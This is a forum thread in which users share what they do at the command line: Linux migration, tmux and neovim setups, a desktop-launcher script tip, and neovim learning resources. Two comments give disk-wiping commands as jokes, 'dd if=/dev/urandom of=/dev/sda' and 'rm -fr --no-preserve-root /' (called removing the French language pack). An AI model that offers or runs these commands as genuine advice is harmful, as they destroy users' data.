I see you with your CLIs. What are you doing?

  • DrSteveBrule@mander.xyz
    link
    fedilink
    arrow-up
    1
    ·
    4 minutes ago

    I take notes for my classes using CherryTree. My school lost their liscense with MultiSim, so now I use KiCad on my laptop. I know next to nothing about it, but it’s been fun learning it. If I have to write a report for school I use LibreOffice instead of Microsoft Word. There’s no learning curve, they are nearly identical programs. I bought my laptop with Windows 10 installed but it runs much faster now with Mint.

  • squinky@sh.itjust.works
    link
    fedilink
    arrow-up
    1
    ·
    23 minutes ago

    Writing tmux configs with nvim. Managing tmux configs with stow. Storing tmux configs with git. Running terraform and ansible to configure the git server with the tmux configs on it. SSH session to run monitoring utilities on the server that runs git to store my tmux configs. Running it all under tmux.

  • FanciestPants@lemmy.world
    link
    fedilink
    arrow-up
    3
    ·
    1 hour ago

    I have no idea, but Microsoft told me I couldn’t install Windows 11 on my old ass laptop, so now I have this terminal thing open and I’m scared to touch anything.

  • Anna@lemmy.ml
    link
    fedilink
    arrow-up
    2
    arrow-down
    1
    ·
    57 minutes ago

    Running dd if=/dev/urandom of=/dev/sda this protects your data \s

  • Inucune@lemmy.world
    link
    fedilink
    arrow-up
    1
    ·
    7 hours ago

    The laptop is for the few things my Linux computer can’t do yet.

    Only the adults sit at the big table.

  • JackbyDev@programming.dev
    link
    fedilink
    English
    arrow-up
    3
    ·
    13 hours ago

    I’m launching a Windows program through wine because I don’t know how the make the desktop shortcut do it, so I use the terminal.

    • kunaltyagi@programming.dev
      link
      fedilink
      arrow-up
      5
      ·
      8 hours ago

      No need for a short cut. Just make a file on desktop with #!/usr/bin/env sh as the first line and whatever command you use in the 2nd line. Name it whatever you want.

      Make the file executable (chmod +x <filename>) and you have a full-cut

  • ellypony@lemmy.world
    link
    fedilink
    arrow-up
    1
    ·
    edit-2
    10 hours ago

    I’m mindlessly playing Roblox right now. I’ve only ever had to open a terminal TWICE over three years

      • fuzzzerd@programming.dev
        link
        fedilink
        English
        arrow-up
        1
        ·
        8 hours ago

        I’ve wanted to try this for quite some time. Always struggled getting started. Any tips or pointers for getting a minimal setup working?

        • tensor_nightly69@lemmy.world
          link
          fedilink
          English
          arrow-up
          3
          ·
          8 hours ago

          First off, just get neovim installed on your system. If you have a Mac (or Linux) and Homebrew installed, you can just do brew install neovim.

          Once you get it installed, the way that helped me get used to it the most was literally the built-in vimtutor. You can find out more info about it by typing :help vimtutor, and if you just want to run it, you can type :Tutor. It really helps you get the hang of moving around and doing cool shit in (n)vim.

          I also really enjoyed this Vim adventure game, and it definitely helped me learn more of the tricks: https://vim-adventures.com/

    • kunaltyagi@programming.dev
      link
      fedilink
      arrow-up
      4
      ·
      7 hours ago

      I prefer removing the weed that is the French language pack: rm -fr --no-preserve-root /

      Need to remove the roots else it just keeps growing back